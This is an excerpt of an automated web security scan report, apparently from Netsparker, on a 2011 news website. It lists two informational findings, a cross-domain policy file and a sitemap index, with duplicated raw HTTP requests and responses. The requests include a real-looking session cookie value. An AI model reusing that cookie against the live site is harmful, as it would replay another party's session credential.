Netsparker identified a Crossdomain.xml file on the target web site. This issue is reported as extra information.
Impact
This issue is reported as extra information, there is no direct impact resulting from this issue.
|
- /crossdomain.xml
/crossdomain.xml |
Policy Rules
- www.fastcompany.com
- *.www.fastcompany.com
Request
GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:45:43 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sun, 06 Mar 2011 20:05:44 GMT
Last-Modified: Sun, 06 Mar 2011 19:45:44 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1299440744"
Vary: Accept-Encoding
Content-Encoding:
X-Served-By: daa-www014
Content-Length: 169
Content-Type: text/xml
X-Cache: MISS from VoxCAST
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.fastcompany.com" /> <allow-access-from domain="*.www.fastcompany.com" /></cross-domain-policy>
Date: Sun, 06 Mar 2011 19:45:43 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sun, 06 Mar 2011 20:05:44 GMT
Last-Modified: Sun, 06 Mar 2011 19:45:44 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1299440744"
Vary: Accept-Encoding
Content-Encoding:
X-Served-By: daa-www014
Content-Length: 169
Content-Type: text/xml
X-Cache: MISS from VoxCAST
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.fastcompany.com" /> <allow-access-from domain="*.www.fastcompany.com" /></cross-domain-policy>
Sitemap Identified
Sitemap Identified
1
TOTAL
INFORMATION
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.
Impact
This issue is reported as extra information, there is no direct impact resulting from this.
|
- /sitemap.xml
/sitemap.xml |
Request
GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:45:42 GMT
Server: VoxCAST
Last-Modified: Thu, 03 Mar 2011 23:51:24 GMT
ETag: "c39624-f66-b5005700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
X-Served-By: daa-www011
Content-Length: 332
X-Cache: HIT from VoxCAST
Age: 1
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd"> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap0.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap1.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap2.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap3.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap4.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap5.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap6.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap7.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap8.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap9.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap10.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap11.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap12.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap13.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap14.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap15.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap16.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap17.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap18.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap19.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap20.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap21.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap22.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap23.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap24.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap25.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap26.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap27.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap28.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap29.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap30.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap31.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap32.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap33.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap34.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap35.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap36.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap37.xml</loc> </sitemap></sitemapindex>
Date: Sun, 06 Mar 2011 19:45:42 GMT
Server: VoxCAST
Last-Modified: Thu, 03 Mar 2011 23:51:24 GMT
ETag: "c39624-f66-b5005700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
X-Served-By: daa-www011
Content-Length: 332
X-Cache: HIT from VoxCAST
Age: 1
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd"> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap0.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap1.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap2.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap3.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap4.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap5.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap6.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap7.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap8.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap9.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap10.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap11.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap12.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap13.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap14.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap15.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap16.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap17.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap18.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap19.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap20.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap21.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap22.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap23.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap24.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap25.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap26.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap27.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap28.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap29.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap30.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap31.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap32.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap33.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap34.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap35.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap36.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap37.xml</loc> </sitemap></sitemapindex>